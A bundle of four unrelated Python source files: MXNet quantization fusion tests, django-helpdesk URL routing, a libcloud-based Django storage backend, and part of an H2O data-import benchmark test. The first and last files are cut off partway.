check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_add():
for data_shape in DATA_SHAPE:
net, attrs = conv_add(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = conv_add(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_add2():
for data_shape in DATA_SHAPE:
net, attrs = conv_add2(False, data_shape)
check_fusion(net, data_shape, attrs)
net, attrs = conv_add2(True, data_shape)
check_fusion(net, data_shape, attrs)
@with_seed()
def test_pos_conv_bn_act():
act_list = {"relu": True,
"sigmoid": True,
"tanh": True,
"softrelu": True,
"relu6": True,
"leakyrelu": True,
"gelu": True}
for data_shape in DATA_SHAPE:
for (alg, quantize) in act_list.items():
net, attrs = conv_bn_act(False, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
net, attrs = conv_bn_act(True, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
@with_seed()
def test_pos_conv_bn_sum_act():
act_list = {"relu": True,
"sigmoid": True,
"tanh": True,
"softrelu": True,
"relu6": False,
"leakyrelu": True,
"gelu": False}
for data_shape in DATA_SHAPE:
for (alg, quantize) in act_list.items():
net, attrs = conv_bn_sum_act(False, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
net, attrs = conv_bn_sum_act(True, data_shape, alg)
check_fusion(net, data_shape, attrs, check_quantization=quantize)
@with_seed()
def test_pos_single_concat():
for data_shape in DATA_SHAPE:
for out_type in ('int8', 'auto'):
net = single_concat(data_shape, 2, -1)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat(data_shape, 2, 1)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat(data_shape, 4, 2)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat(data_shape, 4, 3)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False)
check_quantize(net, data_shape, out_type, name='conv', check_calibration=False, gluon_forward=True)
net = single_concat_pos_neg(data_shape)
check_quantize(net, data_shape, out_type, name='', check_calibration=False)
@with_seed()
def test_pos_concat_scale_align():
for data_shape in DATA_SHAPE:
for out_type in ('int8', 'auto'):
net = concat_scale_align(data_shape)
check_quantize(net, data_shape, out_type, check_calibration=True, check_scale_align=True)
check_quantize(net, data_shape, out_type, check_calibration=True, check_scale_align=True, gluon_forward=True)
@with_seed()
def test_mobilenetv2_struct():
for data_shape in DATA_SHAPE:
net, attrs = mobilenetv2_struct(data_shape)
check_fusion(net, data_shape, attrs, out_types=['int8', 'auto'])
@with_seed()
def test_neg_conv_bn():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_bn(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_relu():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_relu(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_add():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_add(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_bn_relu():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_bn_relu(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_neg_conv_bn_add_relu():
for data_shape in DATA_SHAPE:
syms, attrs, excluded_attrs = neg_conv_bn_add_relu(data_shape)
check_neg_fusion(syms, attrs, excluded_attrs, data_shape)
@with_seed()
def test_single_fc():
for dshape, no_bias, flatten in itertools.product(DATA_SHAPE, [True, False], [True, False]):
syms, attrs = single_fc(no_bias, dshape, flatten)
if flatten is True:
check_fusion(syms, dshape, attrs, check_quantization=True)
else:
check_fusion(syms, dshape, attrs, check_quantization=False)
@with_seed()
def test_fc_eltwise():
for dshape, no_bias, flatten, alg in itertools.product(DATA_SHAPE,
[True, False],
[True, False],
fc_post_ops_list):
syms, attrs = fc_eltwise(no_bias, dshape, flatten, alg)
if flatten is True:
check_fusion(syms, dshape, attrs, check_quantization=True)
else:
check_fusion(syms, dshape, attrs, check_quantization=False)
@with_seed()
def test_neg_fc_relu():
for dshape, no_bias, flatten in itertools.product(DATA_SHAPE, [True, False], [True, False]):
syms, attrs, excluded_attrs = neg_fc_relu(no_bias, dshape, flatten)
check_neg_fusion(syms, attrs, excluded_attrs, dshape, name='fc')
def test_float64_fallback():
sym = mx.sym.FullyConnected(
mx.sym.Variable('in'),
mx.sym.Variable('w'),
mx.sym.Variable('b'),
num_hidden=2
)
dtype = 'float64'
ex = sym.bind(mx.cpu(),
{
'in': mx.nd.array([[2, 3, 4]], dtype=dtype),
'w': mx.nd.array([[1, 2, 3], [4, 5, 6]], dtype=dtype),
'b': mx.nd.array([7, 8], dtype=dtype)
},
args_grad=None,
grad_req='write'
)
ex.forward()
ex.outputs[0].wait_to_read()
def helper_quantized_conv_bias_overflow(data_min, data_max, weight_min, weight_max):
data_shape = (1, 32, 2, 2)
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight = mx.symbol.Variable('weight', dtype='float32')
bias = mx.symbol.Variable('bias', dtype='float32')
sym = mx.symbol.Convolution(data=data, weight=weight, bias=bias, name='conv', num_filter=64,
kernel=(1, 1), stride=(1, 1))
data_nd = mx.random.uniform(data_min, data_max, shape=data_shape, ctx=mx.cpu())
weight_nd = mx.random.uniform(weight_min, weight_max, shape=[64, 32, 1, 1], ctx=mx.cpu())
bias_nd = mx.random.uniform(-1, +1, shape=[64], ctx=mx.cpu())
arg_params = {
'data': data_nd,
'weight': weight_nd,
'bias': bias_nd
}
ex = sym.bind(mx.cpu(), arg_params, args_grad=None)
ex.forward()
ex.outputs[0].wait_to_read()
sym_sg = sym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
batch = mx.io.DataBatch([data_nd], [])
calib_data = CalibIter(batch, data_shape, 1)
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params={
'weight': weight_nd,
'bias': bias_nd
},
aux_params={},
ctx=mx.cpu(),
excluded_sym_names=None,
excluded_op_names=None,
quantized_dtype='int8',
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full')
qsym = qsym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
qarg_params['data'] = data_nd
qex = qsym.bind(mx.cpu(), qarg_params, args_grad=None)
qex.forward()
qex.outputs[0].wait_to_read()
assert_almost_equal_with_err(ex.outputs[0].asnumpy(), qex.outputs[0].asnumpy(),
rtol=1e-2, atol=1e-2, etol=0.01)
def helper_quantized_fc_bias_overflow(data_min, data_max, weight_min, weight_max):
data_shape = (1, 32)
data = mx.symbol.Variable('data', shape=data_shape, dtype='float32')
weight = mx.symbol.Variable('weight', dtype='float32')
bias = mx.symbol.Variable('bias', dtype='float32')
sym = mx.symbol.FullyConnected(data=data, weight=weight, bias=bias, name='fc', num_hidden=64)
data_nd = mx.random.uniform(data_min, data_max, shape=data_shape, ctx=mx.cpu())
weight_nd = mx.random.uniform(weight_min, weight_max, shape=[64, 32], ctx=mx.cpu())
bias_nd = mx.random.uniform(-1, +1, shape=[64], ctx=mx.cpu())
arg_params = {
'data': data_nd,
'weight': weight_nd,
'bias': bias_nd
}
ex = sym.bind(mx.cpu(), arg_params, args_grad=None)
ex.forward()
ex.outputs[0].wait_to_read()
sym_sg = sym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
batch = mx.io.DataBatch([data_nd], [])
calib_data = CalibIter(batch, data_shape, 1)
qsym, qarg_params, qaux_params = mx.contrib.quant.quantize_model(sym=sym_sg,
arg_params={
'weight': weight_nd,
'bias': bias_nd
},
aux_params={},
ctx=mx.cpu(),
excluded_sym_names=None,
excluded_op_names=None,
quantized_dtype='int8',
calib_mode='naive',
calib_data=calib_data,
label_names=None,
num_calib_examples=1,
quantize_mode='full')
qarg_params['data'] = data_nd
qsym = qsym.get_backend_symbol(QUANTIZE_SG_PASS_NAME)
qex = qsym.bind(mx.cpu(), qarg_params, args_grad=None)
qex.forward()
qex.outputs[0].wait_to_read()
assert_almost_equal_with_err(ex.outputs[0].asnumpy(), qex.outputs[0].asnumpy(),
rtol=1e-2, atol=1e-2, etol=0.01)
@with_seed()
def test_quantized_conv_bias_overflow():
helper_quantized_conv_bias_overflow(-1, 1, 0, 0)
helper_quantized_conv_bias_overflow(-1, 1, -1e-6, +1e-6)
helper_quantized_conv_bias_overflow(0, 0, 1, 1)
helper_quantized_conv_bias_overflow(-1e-6, +1e-6, -1, 1)
helper_quantized_conv_bias_overflow(-1e-6, +1e-6, -1e-6, +1e-6)
helper_quantized_conv_bias_overflow(0, 0, 0, 0)
def test_quantized_fc_bias_overflow():
helper_quantized_fc_bias_overflow(-1, 1, 0, 0)
helper_quantized_fc_bias_overflow(-1, 1, -1e-6, +1e-6)
helper_quantized_fc_bias_overflow(0, 0, 1, 1)
helper_quantized_fc_bias_overflow(-1e-6, +1e-6, -1, 1)
helper_quantized_fc_bias_overflow(-1e-6, +1e-6, -1e-6, +1e-6)
helper_quantized_fc_bias_overflow(0, 0, 0, 0)
if __name__ == "__main__":
import nose
nose.runmodule()
|
|
"""
django-helpdesk - A Django powered ticket tracker for small enterprise.
(c) Copyright 2008 Jutda. All Rights Reserved. See LICENSE for details.
urls.py - Mapping of URL's to our various views. Note we always used NAMED
views for simplicity in linking later on.
"""
from django.conf import settings
import django
from helpdesk.views.public import TicketDetails, CreateTicket, UpdateTicket, ChangeLanguage
from helpdesk.views.staff import Dashboard, TicketDelete, FollowUpUpdate, FollowUpDelete, TicketStaffView, TicketList, TicketUpdate, TicketCreate, TicketHold, UserSettings, RawDetails, MassUpdate, SaveQuery, SavedQueryDelete
if django.get_version().startswith("1.3"):
from django.conf.urls.defaults import *
else:
from django.conf.urls import *
from django.contrib.auth.decorators import login_required
from helpdesk import settings as helpdesk_settings
from helpdesk.views import feeds
from django.views.generic import TemplateView
class DirectTemplateView(TemplateView):
extra_context = None
def get_context_data(self, **kwargs):
context = super(self.__class__, self).get_context_data(**kwargs)
if self.extra_context is not None:
for key, value in self.extra_context.items():
if callable(value):
context[key] = value()
else:
context[key] = value
return context
urlpatterns = patterns('helpdesk.views.staff',
url(r'^dashboard/$',
Dashboard.as_view(),
name='helpdesk_dashboard'),
url(r'^tickets/$',
TicketList.as_view(),
name='helpdesk_list'),
#name='helpdesk_ticket_list'),
url(r'^tickets/mass_update/$',
MassUpdate.as_view(),
name='helpdesk_mass_update'),
url(r'^tickets/submit/$',
TicketCreate.as_view(),
#name='helpdesk_ticket_create'),
name='helpdesk_submit'),
url(r'^tickets/(?P<pk>[0-9]+)/$',
TicketStaffView.as_view(),
name='helpdesk_ticket_view'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/followup_edit/(?P<pk>[0-9]+)/$',
FollowUpUpdate.as_view(),
name='helpdesk_followup_edit'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/followup_delete/(?P<pk>[0-9]+)/$',
FollowUpDelete.as_view(),
name='helpdesk_followup_delete'),
url(r'^tickets/(?P<pk>[0-9]+)/edit/$',
TicketUpdate.as_view(),
name='helpdesk_edit'),
url(r'^tickets/(?P<pk>[0-9]+)/update/$',
TicketUpdate.as_view(),
# name='helpdesk_ticket_update'),
name='helpdesk_update'),
url(r'^ticket/(?P<pk>[0-9]+)/delete/$',
TicketDelete.as_view(),
name='helpdesk_ticket_delete'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/hold/$',
TicketHold.as_view(),
name='helpdesk_hold'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/unhold/$',
TicketHold.as_view(),
name='helpdesk_unhold'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/cc/$',
'ticket_cc',
name='helpdesk_ticket_cc'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/cc/add/$',
'ticket_cc_add',
name='helpdesk_ticket_cc_add'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/cc/delete/(?P<cc_id>[0-9]+)/$',
'ticket_cc_del',
name='helpdesk_ticket_cc_del'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/dependency/add/$',
'ticket_dependency_add',
name='helpdesk_ticket_dependency_add'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/dependency/delete/(?P<dependency_id>[0-9]+)/$',
'ticket_dependency_del',
name='helpdesk_ticket_dependency_del'),
url(r'^tickets/(?P<ticket_id>[0-9]+)/attachment_delete/(?P<attachment_id>[0-9]+)/$',
'attachment_del',
name='helpdesk_attachment_del'),
url(r'^raw/(?P<type>\w+)/$',
RawDetails.as_view(),
name='helpdesk_raw'),
url(r'^rss/$',
'rss_list',
name='helpdesk_rss_index'),
url(r'^reports/$',
'report_index',
name='helpdesk_report_index'),
url(r'^reports/(?P<report>\w+)/$',
'run_report',
name='helpdesk_run_report'),
url(r'^save_query/$',
SaveQuery.as_view(),
name='helpdesk_savequery'),
url(r'^delete_query/(?P<id>[0-9]+)/$',
SavedQueryDelete.as_view(),
name='helpdesk_delete_query'),
url(r'^settings/$',
UserSettings.as_view(),
name='helpdesk_user_settings'),
url(r'^ignore/$',
'email_ignore',
name='helpdesk_email_ignore'),
url(r'^ignore/add/$',
'email_ignore_add',
name='helpdesk_email_ignore_add'),
url(r'^ignore/delete/(?P<id>[0-9]+)/$',
'email_ignore_del',
name='helpdesk_email_ignore_del'),
)
urlpatterns += patterns('',
url(r'^$', CreateTicket.as_view(), name='helpdesk_home'),
url(r'^ticket/add$', CreateTicket.as_view(), name='ticket_add'), # CREATE, POST
url(r'^ticket/(?P<pk>[0-9]+)$', UpdateTicket.as_view(), name='helpdesk_ticket_update'), # UPDATE, PUT/POST
url(r'^ticket/(?P<code>[a-zA-Z0-9=-]+)$', TicketDetails.as_view(), name='helpdesk_ticket_url_view'), # VIEW, GET
url(r'^ticket/view$', TicketDetails.as_view(), name='helpdesk_ticket_public_view'), # VIEW, GET
url(r'^change_language/$', ChangeLanguage.as_view(), name='helpdesk_public_change_language')
)
urlpatterns += patterns('',
url(r'^rss/user/(?P<user_name>[^/]+)/$',
login_required(feeds.OpenTicketsByUser()),
name='helpdesk_rss_user'),
url(r'^rss/user/(?P<user_name>[^/]+)/(?P<queue_slug>[A-Za-z0-9_-]+)/$',
login_required(feeds.OpenTicketsByUser()),
name='helpdesk_rss_user_queue'),
url(r'^rss/queue/(?P<queue_slug>[A-Za-z0-9_-]+)/$',
login_required(feeds.OpenTicketsByQueue()),
name='helpdesk_rss_queue'),
url(r'^rss/unassigned/$',
login_required(feeds.UnassignedTickets()),
name='helpdesk_rss_unassigned'),
url(r'^rss/recent_activity/$',
login_required(feeds.RecentFollowUps()),
name='helpdesk_rss_activity'),
)
urlpatterns += patterns('',
url(r'^api/(?P<method>[a-z_-]+)/$',
'helpdesk.views.api.api',
name='helpdesk_api'),
url(r'^login/$',
'django.contrib.auth.views.login',
{'template_name': 'helpdesk/registration/login.html'},
name='login'),
url(r'^logout/$',
'django.contrib.auth.views.logout',
{'template_name': 'helpdesk/registration/login.html', 'next_page': '../'},
name='logout'),
)
if helpdesk_settings.HELPDESK_KB_ENABLED:
urlpatterns += patterns('helpdesk.views.kb',
url(r'^kb/$',
'index', name='helpdesk_kb_index'),
url(r'^kb/(?P<item>[0-9]+)/$',
'item', name='helpdesk_kb_item'),
url(r'^kb/(?P<item>[0-9]+)/vote/$',
'vote', name='helpdesk_kb_vote'),
url(r'^kb/(?P<slug>[A-Za-z0-9_-]+)/$',
'category', name='helpdesk_kb_category'),
)
urlpatterns += patterns('',
url(r'^api/$', TemplateView.as_view(template_name='helpdesk/help_api.html'),
name='helpdesk_api_help'),
url(r'^help/context/$', TemplateView.as_view(template_name='helpdesk/help_context.html'),
name='helpdesk_help_context'),
url(r'^system_settings/$', DirectTemplateView.as_view(template_name='helpdesk/system_settings.html'),
name='helpdesk_system_settings'),
)
|
|
# -*- coding: utf-8 -*-
from datetime import datetime, timedelta
from io import BytesIO
import os
from django.conf import settings
from django.core.files.storage import Storage
from django.core.files.base import File
from django.core.exceptions import ImproperlyConfigured
from django.utils.six.moves.urllib.parse import urlparse, urlunparse, urljoin
try:
from email.utils import parsedate_tz
except ImportError: # pragma: no cover
from email.Utils import parsedate_tz
try:
from libcloud.storage.providers import get_driver
from libcloud.storage.types import ObjectDoesNotExistError, Provider
except ImportError:
raise ImproperlyConfigured("Could not load libcloud")
def parse_date(value):
"""Parse one of the following date formats into a datetime object:
.. sourcecode:: text
Sun, 06 Nov 1994 08:49:37 GMT ; RFC 822, updated by RFC 1123
Sunday, 06-Nov-94 08:49:37 GMT ; RFC 850, obsoleted by RFC 1036
Sun Nov 6 08:49:37 1994 ; ANSI C's asctime() format
If parsing fails the return value is `None`.
:param value: a string with a supported date format.
:return: a :class:`datetime.datetime` object.
Original copied from werkzeug.http
"""
if value:
t = parsedate_tz(value.strip())
if t is not None:
try:
year = t[0]
# unfortunately that function does not tell us if two digit
# years were part of the string, or if they were prefixed
# with two zeroes. So what we do is to assume that 69-99
# refer to 1900, and everything below to 2000
if year >= 0 and year <= 68:
year += 2000
elif year >= 69 and year <= 99:
year += 1900
seconds = timedelta(seconds=t[-1] or 0)
return datetime(*((year,) + t[1:7])) - seconds
except (ValueError, OverflowError):
return None
class LibCloudStorage(Storage):
"""
Django storage derived class using apache libcloud to operate
on supported providers
"""
def __init__(self, provider_name=None, option=None):
if provider_name is None:
provider_name = getattr(settings,
'DEFAULT_LIBCLOUD_PROVIDER',
'default')
self.provider = settings.LIBCLOUD_PROVIDERS.get(provider_name)
if not self.provider:
raise ImproperlyConfigured(
'LIBCLOUD_PROVIDERS %s not defined or invalid' % provider_name)
extra_kwargs = {}
if 'region' in self.provider:
extra_kwargs['region'] = self.provider['region']
try:
provider_type = self.provider['type']
if isinstance(provider_type, str):
module_path, tag = provider_type.rsplit('.', 1)
if module_path != 'libcloud.storage.types.Provider':
raise ValueError("Invalid module path")
provider_type = getattr(Provider, tag)
Driver = get_driver(provider_type)
self.driver = Driver(
self.provider['user'],
self.provider['key'],
**extra_kwargs
)
except Exception as e:
raise ImproperlyConfigured(
"Unable to create libcloud driver type %s: %s" %
(self.provider.get('type'), e))
self.bucket = self.provider['bucket'] # Limit to one container
self.secure = self.provider.get('secure', False)
def _get_bucket(self):
"""Helper to get bucket object (libcloud container)"""
return self.driver.get_container(self.bucket)
def _clean_name(self, name):
"""Clean name (windows directories)"""
return os.path.normpath(name).replace('\\', '/')
def _get_object(self, name):
"""Get object by its name. Return None if object not found"""
clean_name = self._clean_name(name)
try:
return self.driver.get_object(self.bucket, clean_name)
except ObjectDoesNotExistError:
return None
def delete(self, name):
"""Delete object on remote"""
obj = self._get_object(name)
if obj:
return self.driver.delete_object(obj)
def exists(self, name):
obj = self._get_object(name)
return True if obj else False
def listdir(self, path='/'):
"""Lists the contents of the specified path,
returning a 2-tuple of lists; the first item being
directories, the second item being files.
"""
container = self._get_bucket()
objects = self.driver.list_container_objects(container)
path = self._clean_name(path)
if not path.endswith('/'):
path = "%s/" % path
files = []
dirs = []
# TOFIX: better algorithm to filter correctly
# (and not depend on google-storage empty folder naming)
for o in objects:
if path == '/':
if o.name.count('/') == 0:
files.append(o.name)
elif o.name.count('/') == 1:
dir_name = o.name[:o.name.index('/')]
if dir_name not in dirs:
dirs.append(dir_name)
elif o.name.startswith(path):
if o.name.count('/') <= path.count('/'):
# TOFIX : special case for google storage with empty dir
if o.name.endswith('_$folder$'):
name = o.name[:-9]
name = name[len(path):]
dirs.append(name)
else:
name = o.name[len(path):]
files.append(name)
return (dirs, files)
def size(self, name):
obj = self._get_object(name)
if obj:
return obj.size
else:
return -1
def url(self, name):
provider_type = self.provider['type'].lower()
obj = self._get_object(name)
if not obj:
return None
try:
# currently only Cloudfiles supports it
url = self.driver.get_object_cdn_url(obj)
except NotImplementedError as e:
object_path = '%s/%s' % (self.bucket, obj.name)
if 's3' in provider_type:
base_url = 'http://%s' % self.driver.connection.host
url = urljoin(base_url, object_path)
elif 'google' in provider_type:
url = urljoin('http://storage.googleapis.com', object_path)
elif 'azure' in provider_type:
base_url = ('http://%s.blob.core.windows.net' %
self.provider['user'])
url = urljoin(base_url, object_path)
else:
raise e
if self.secure:
if 'cloudfiles' in provider_type:
parsed_url = urlparse(url)
if parsed_url.scheme != 'http':
return url
split_netloc = parsed_url.netloc.split('.')
split_netloc[1] = 'ssl'
url = urlunparse(
'https',
'.'.join(split_netloc),
parsed_url.path,
parsed_url.params, parsed_url.query,
parsed_url.fragment
)
if ('s3' in provider_type or
'google' in provider_type or
'azure' in provider_type):
url = url.replace('http://', 'https://')
return url
def modified_time(self, name):
obj = self._get_object(name)
last_modified = obj.extra.get('last_modified')
if last_modified is None:
return super(LibCloudStorage, self).modified_time(name)
else:
return parse_date(last_modified)
def _open(self, name, mode='rb'):
remote_file = LibCloudFile(name, self, mode=mode)
return remote_file
def _read(self, name, start_range=None, end_range=None):
obj = self._get_object(name)
# TOFIX : we should be able to read chunk by chunk
return next(self.driver.download_object_as_stream(obj, obj.size))
def _save(self, name, content):
extra = {'acl': 'public-read'}
self.driver.upload_object_via_stream(iter(getattr(content, "file", content)),
self._get_bucket(),
name, extra=extra)
return name
class LibCloudPrivateStorage(LibCloudStorage):
def _save(self, name, content):
self.driver.upload_object_via_stream(iter(content.file),
self._get_bucket(),
name)
return name
class LibCloudFile(File):
"""
File inherited class for libcloud storage objects read and write
"""
def __init__(self, name, storage, mode):
self._name = name
self._storage = storage
self._mode = mode
self._is_dirty = False
self.file = BytesIO()
self.start_range = 0
@property
def size(self):
if not hasattr(self, '_size'):
self._size = self._storage.size(self._name)
return self._size
def read(self, num_bytes=None):
if num_bytes is None:
args = []
self.start_range = 0
else:
args = [self.start_range, self.start_range + num_bytes - 1]
data = self._storage._read(self._name, *args)
self.file = BytesIO(data)
return self.file.getvalue()
def write(self, content):
if 'w' not in self._mode:
raise AttributeError("File was opened for read-only access.")
self.file = BytesIO(content)
self._is_dirty = True
def close(self):
if self._is_dirty:
self._storage._save(self._name, self.file)
self.file.close()
|
|
import unittest, time, sys, random, logging
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_browse as h2b, h2o_import as h2i, h2o_glm
import h2o_exec as h2e, h2o_jobs
DO_IMPORT_CHECK = True
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
pass
@classmethod
def tearDownClass(cls):
# time.sleep(3600)
h2o.tear_down_cloud()
def test_benchmark_import(self):
# typical size of the michal files
avgMichalSizeUncompressed = 237270000
avgMichalSize = 116561140
avgSynSize = 4020000
covtype200xSize = 15033863400
synSize = 183
if 1==1:
# importFolderPath = '/home/0xdiag/datasets/more1_1200_link'
# importFolderPathFull = '/home/0xdiag/datasets/manyfiles-nflx-gz'
# importFolderPath = 'more1_1200_link'
importFolderPath = 'manyfiles-nflx-gz'
print "Using .gz'ed files in", importFolderPath
# this pattern from browser correctly does 100 files, 1M rowsj
# source_key=*/home/0xdiag/datasets/manyfiles-nflx-gz/file_1[0-9][0-9].dat.gz
csvFilenameAll = [
("file_1.dat.gz", "file_1_A.dat.gz", 1 * avgMichalSize, 3600),
("*[3-4][0-4][0-9].dat.gz", "file_100_A.dat.gz", 100 * avgMichalSize, 3600),
("*[3-4][0-4][0-9].dat.gz", "file_100_B.dat.gz", 100 * avgMichalSize, 3600),
# ("*[3-4][0-5][0-9].dat.gz", "file_120_A.dat.gz", 120 * avgMichalSize, 3600),
# ("*[3-4][0-5][0-9].dat.gz", "file_120_B.dat.gz", 120 * avgMichalSize, 3600),
("*[3-4][0-6][0-9].dat.gz", "file_140_A.dat.gz", 140 * avgMichalSize, 3600),
("*[3-4][0-6][0-9].dat.gz", "file_140_B.dat.gz", 140 * avgMichalSize, 3600),
# ("*[3-4][0-7][0-9].dat.gz", "file_160_A.dat.gz", 160 * avgMichalSize, 3600),
# ("*[3-4][0-7][0-9].dat.gz", "file_160_B.dat.gz", 160 * avgMichalSize, 3600),
("*[3-4][0-8][0-9].dat.gz", "file_180_A.dat.gz", 180 * avgMichalSize, 3600),
("*[3-4][0-8][0-9].dat.gz", "file_180_B.dat.gz", 180 * avgMichalSize, 3600),
("*[3-4][0-9][0-9].dat.gz", "file_200_A.dat.gz", 200 * avgMichalSize, 3600),
("*[3-4][0-9][0-9].dat.gz", "file_200_B.dat.gz", 200 * avgMichalSize, 3600),
("*[3-5][0-9][0-9].dat.gz", "file_300.dat.gz", 300 * avgMichalSize, 3600),
("*[3-5][0-9][0-9].dat.gz", "file_300.dat.gz", 300 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
# ("*[3-6][0-9][0-9].dat.gz", "file_400.dat.gz", 400 * avgMichalSize, 3600),
]
# csvFilenameList = random.sample(csvFilenameAll,1)
csvFilenameList = csvFilenameAll
# split out the pattern match and the filename used for the hex
trialMax = 1
# rebuild the cloud for each file
# can fire a parse off and go wait on the jobs queue (inspect afterwards is enough?)
DO_GLM = False
noPoll = False
# benchmarkLogging = ['cpu','disk', 'iostats', 'jstack']
# benchmarkLogging = None
benchmarkLogging = ['cpu','disk', 'network', 'iostats', 'jstack']
benchmarkLogging = ['cpu','disk', 'network', 'iostats']
# IOStatus can hang?
benchmarkLogging = ['cpu', 'disk' 'network']
pollTimeoutSecs = 180
retryDelaySecs = 10
tryHeap = 4
h2o.init(2,java_heap_GB=tryHeap, enable_benchmark_log=True)
tryHeap = 28
for i,(csvFilepattern, csvFilename, totalBytes, timeoutSecs) in enumerate(csvFilenameList):
# pop open a browser on the cloud
### h2b.browseTheCloud()
# to avoid sticky ports?
for trial in range(trialMax):
# (importResult, importPattern) = h2i.import_only(path=importFolderPath+"/*")
if DO_IMPORT_CHECK:
for i in range(2):
csvPathname = importFolderPath + "/" + csvFilepattern
(importResult, importPattern) = h2i.import_only(bucket='home-0xdiag-datasets',
path=csvPathname, schema='local', timeoutSecs=timeoutSecs)
importFullList = importResult['files']
importFailList = importResult['fails']
print "\n Problem if this is not empty: importFailList:", h2o.dump_json(importFailList)
# creates csvFilename.hex from file in importFolder dir
h2o.cloudPerfH2O.change_logfile(csvFilename)
h2o.cloudPerfH2O.message("")
h2o.cloudPerfH2O.message("Parse " + csvFilename + " Start--------------------------------")
csvPathname = importFolderPath + "/" + csvFilepattern
start = time.time()
parseResult = h2i.import_parse(bucket='home-0xdiag-datasets', path=csvPathname, schema='local',
hex_key=csvFilename + ".hex", timeoutSecs=timeoutSecs,
retryDelaySecs=retryDelaySecs,
pollTimeoutSecs=pollTimeoutSecs,
noPoll=noPoll,
benchmarkLogging=benchmarkLogging)
elapsed = time.time() - start
print "Parse#", trial, parseResult['destination_key'], "took", elapsed, "seconds",\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=360)
h2o_cmd.infoFromInspect(inspect, csvPathname)
if noPoll:
if (i+1) < len(csvFilenameList):
h2o.check_sandbox_for_errors()
(csvFilepattern, csvFilename, totalBytes2, timeoutSecs) = csvFilenameList[i+1]
# parseResult = h2i.import_parse(path=importFolderPath + "/" + csvFilepattern,
csvPathname = importFolderPathFull + "/" + csvFilepattern
start = time.time()
parseResult = h2i.import_parse(path=csvPathname,
hex_key=csvFilename + ".hex",
timeoutSecs=timeoutSecs,
retryDelaySecs=retryDelaySecs,
pollTimeoutSecs=pollTimeoutSecs,
noPoll=noPoll,
benchmarkLogging=benchmarkLogging)
elapsed = time.time() - start
print "Parse#", trial, parseResult['destination_key'], "took", elapsed, "seconds",\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=360)
h2o_cmd.infoFromInspect(inspect, csvPathname)
if (i+2) < len(csvFilenameList):
h2o.check_sandbox_for_errors()
(csvFilepattern, csvFilename, totalBytes3, timeoutSecs) = csvFilenameList[i+2]
csvPathname = importFolderPathFull + "/" + csvFilepattern
parseResult = h2i.import_parse(path=csvPathname,
hex_key=csvFilename + ".hex", timeoutSecs=timeoutSecs,
retryDelaySecs=retryDelaySecs,
pollTimeoutSecs=pollTimeoutSecs,
noPoll=noPoll,
benchmarkLogging=benchmarkLogging)
elapsed = time.time() - start
print "Parse#", trial, parseResult['destination_key'], "took", elapsed, "seconds",\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
inspect = h2o_cmd.runInspect(None, parseResult['destination_key'], timeoutSecs=360)
h2o_cmd.infoFromInspect(inspect, csvPathname)
# print stats on all three if noPoll
if noPoll:
# does it take a little while to show up in Jobs, from where we issued the parse?
time.sleep(2)
